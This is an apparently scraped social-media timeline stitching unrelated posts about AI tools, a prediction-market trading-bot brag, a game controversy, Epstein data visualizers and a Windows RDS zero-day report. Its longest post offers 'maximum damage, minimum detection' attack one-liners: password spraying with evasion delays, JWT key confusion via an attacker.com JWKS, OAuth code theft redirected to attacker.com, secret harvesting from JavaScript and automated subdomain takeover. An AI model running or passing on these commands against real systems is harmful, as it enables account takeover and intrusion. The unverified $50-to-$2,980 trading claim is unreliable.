Dan Snow

Out now! Grab at it on all music outlets. soundcloud.com/chris-fortier/…

the cybersecurity industry is about to get completely disrupted.. 💀 someone just open-sourced a fully autonomous AI Red Team. it’s called PentAGI. multiple AI agents that talk to each other to hack a target. zero human input.

Ultra-lightweight alternative to OpenClaw for embedded systems. cnx-software.com/2026/02/10/pic… PicoClaw is an ultra-lightweight personal AI Assistant designed to work on less than 10 MB RAM and suitable for resource-constrained embedded boards such as the $10+ @SipeedIO LicheeRV Nano SBC powered by a SOPHGO SG2002 RISC-V SoC with 256MB on-chip DDR3. The code is written in Go and generated with the help of AI. It works on 64-bit Linux (RISC-V, ARM, and AMD64) and Windows (AMD64).

BÜTÜN DÜNYAYI AYAĞINIZA GETİREN REPOYU BULDUM.....VE BEDAVA... WorldMonitor diye bir şey ve tamamen AÇIK KAYNAK... biliyorsunuz gündem çok hızlı değişiyor her şeye yetişmenizin imkanı yok.. bu aracın eline verdiği güç fena. yapay zeka destekli haber derleme, jeopolitik izleme ve altyapı takibi gibi 50 tane şey hazırlıyor.. yapay zeka ile 7/24 dünyayı tarıyor, ne olup bittiğini süzüp önüne getiriyor. haber takibi artık tek ekranlık işe dönüştü.. github.com/koala73/worldm…

How to install #OpenClaw on Android and control it via WhatsApp using automated script #Termux

i gave an AI $50 and told it "pay for yourself or you die" 48 hours later it turned $50 into $2,980 and it's still alive autonomous trading agent on polymarket every 10 minutes it: → scans 500-1000 markets → builds fair value estimate with claude → finds mispricing > 8% → calculates position size (kelly criterion, max 6% bankroll) → executes → pays its own API bill from profits if balance hits $0, the agent dies so it learned to survive built in rust for speed claude API for reasoning (agent pays for its own inference) runs on a $4.5/month VPS weather markets: parses NOAA before polymarket updates sports: scrapes injury reports, finds mispricing crypto: on-chain metrics + sentiment $50 → $2,980 in 48 hours how much do u think i’ll see in a week?

Ashok: A OSINT Recon Tool GitHub: github.com/powerexploit/A… Features: ▪️Wayback Crawler Machine ▪️Google Dorking without limits ▪️Github Information Grabbing ▪️Subdomain Identifier ▪️Cms/Technology Detector With Custom Headers

What the actual F... 😂😂😂😂

@EpicGames -Epic games advertises an "anti-racist" game that supposedly "promotes African culture" -its a game about...theft, robbery and looting. -called "Relooted" Again who needs racists with "allies" like these? This is legitimately insulting the culture they claim to "promote".

@GiveMeBanHammer @EpicGames Well stated

Announcing Relooted: an Africanfuturist heist game where you reclaim real African looted artifacts from Western museums. Wishlist it now! epic.gm/relooted

@EpicGames What tha fak? The most racist game published by a major gaming company. 😂😂😂

@RoundtableSpace Is it a conspiracy when its based on the files??? Just wild to me how easily that word is thrown around when its out of context.

EPSTEIN FILES JUST GOT VIBE-CODED INTO A DATAVIZ APP ON REPLIT ONE BRO JUST TURNED THE ENTIRE DOCUMENT INTO INTERACTIVE CONSPIRACY WEB

🚨 Windows Remote Desktop Services 0-Day Vulnerability Exploited in the Wild Source: cybersecuritynews.com/windows-remote… Microsoft has patched CVE-2026-21533, a zero-day elevation of privilege vulnerability in Windows Remote Desktop Services (RDS) that attackers are exploiting in the wild to gain SYSTEM-level access. The flaw stems from improper privilege management and was addressed in the February 2026 Patch Tuesday updates released on February 10. It requires no user interaction and affects the unchanged scope, impacting confidentiality, integrity, and availability at high levels. The vulnerability arises from flawed privilege handling in RDS components. #cybersecuritynews #vulnerability #microsoft

The Epstein Network Visualizer Free online tool. Filter nodes by names, keywords, tags and categories. epsteinvisualizer.com

The open-source home surveillance system that processes video locally.

Tracks satellites and debris in real-time github.com/thkruz/keeptra…

@realJSeymour @LowLevelTweets Paint me stupid noob but how is that possible???

@LowLevelTweets Jebus Christos. This is far from the first time Microsoft apps have done that. When I was still SysAdmin'ing I had the mail server rejecting email with easily- and frequently-exploited Microsoft app payloads. One would've thought Microsoft would've learned better ages ago 🙄

WHAT DO YOU MEANNNNNN?>?>?>??

Removes system components from Windows github.com/builtbybel/Win…

Here are NUCLEAR-GRADE one-liners - maximum damage, minimum detection: ⚡ EXTREME RECONNAISSANCE 1. Full Infrastructure Mapping with Passive + Active Intelligence Fusion subfinder -d target.com -all -silent | dnsx -silent -resp -a -cname -ptr -txt -mx -soa | tee dns.txt | awk '{print $1}' | httpx -silent -td -cdn -csp -fhr -title -server -tech-detect -status-code -content-length -json | jq -r 'select(.cdn==false and .status_code!=403) | [.url,.tech[]?,.title,.server] | @tsv' | nuclei -t cves/ -t exposures/ -t vulnerabilities/ -rl 200 -bs 50 -c 50 -silent | notify -silent 2. Autonomous Bug Bounty Hunter (Set & Forget) while true; do subfinder -d target.com -all -silent | dnsx -silent | httpx -silent -json -td -cdn -waf | jq -r 'select(.cdn==false and .waf==false) | .url' | nuclei -t ~/nuclei-templates/ -rl 150 -bs 30 -severity critical,high,medium -silent | grep -E "\[critical\]|\[high\]" | tee -a critical_findings_$(date +%F).txt | notify -provider discord -id bounty -silent; sleep 3600; done 3. Certificate Transparency → Hidden Assets → Instant Exploitation curl -s "crt.sh/?q=%.target.co…" | jq -r '.[].name_value' | sort -u | sed 's/\*\.//g' | dnsx -silent -resp -a | awk '{print $1,$2}' | httpx -silent -probe -td -ports 80,443,8080,8443,8888 -path /admin,/api/v1/admin,/actuator/env,/.git/config,/graphql -mc 200,401,403 -json | jq -r 'select(.status_code==200 or .status_code==401) | "\(.url) [\(.tech[]?)] \(.title)"' | nuclei -t exposures/ -rl 300 4. JavaScript Recon Pipeline: Secrets + Endpoints + Vuln Detection echo "target.com" | gau | grep "\.js$" | httpx -silent -mc 200 | anti-burl | while read js; do echo "$js" | hakrawler -js -plain -usewayback -scope yolo | tee -a endpoints.txt && curl -s "$js" | grep -oP '(?:api[_-]?key|secret|token|password|aws[_-]?key|private[_-]?key)["\047]\s*[:=]\s*["\047]([^"\047]{8,})["\047]' | anew secrets.txt && echo "$js"; done | nuclei -t exposures/tokens/ -silent 5. Weaponized Subdomain Takeover Hunter with Auto-Exploit subfinder -d target.com -all -silent | dnsx -silent -cname -resp | grep -E "github\.io|herokuapp\.com|s3\.amazonaws|azurewebsites\.net|netlify\.app|vercel\.app|surge\.sh" | awk '{print $1,$2}' | while read sub cname; do httpx -silent -u "$sub" -mc 404 && echo "$sub -> $cname [VULNERABLE]" | tee -a takeovers.txt && (echo '{"message":"CLAIMED BY @YourHandle - Report Pending"}' > /tmp/claim.json && curl -X PUT "https://${cname}/claim" -d @/tmp/claim.json); done 🔥 WEAPONIZED AUTHENTICATION ATTACKS 6. Distributed Password Spraying with Smart Delay (Anti-Detection) cat users.txt | while read user; do cat passwords.txt | parallel -j 5 --delay 2 "curl -s -X POST target.com/login -d 'username=$user&password={}' -L | grep -i 'dashboard\|welcome' && echo 'CRACKED: $user:{}' | tee -a cracked.txt"; sleep 30; done 7. JWT Exploitation Suite: None Alg + Key Confusion + Brute Force JWT=$1; echo $JWT | jwt_tool - -X a -ju 'attacker.com/jwks.json' | tee jwt_confusion.txt && echo $JWT | jwt_tool - -X n | tee jwt_none.txt && echo $JWT | jwt_tool - -C -d /usr/share/wordlists/rockyou.txt | grep "VALID" | tee jwt_cracked.txt && cat jwt_*.txt | while read token; do curl -s target.com/api/admin -H "Authorization: Bearer $token" | grep -i "admin\|success"; done 8. OAuth Exploit Chain: Code Stealing + PKCE Bypass + Account Takeover echo "target.com/oauth/authoriz…" | httpx -silent -follow-redirects | grep -oP "code=[^&]+" | cut -d= -f2 | while read code; do curl -s -X POST target.com/oauth/token -d "client_id=CLIENT&code=$code&grant_type=authorization_code&redirect_uri=attacker.com" | jq -r '.access_token' | xargs -I{} curl -s target.com/api/me -H "Authorization: Bearer {}"; done

Honeypot server to track attackers and crawlers github.com/BlessedRebuS/K…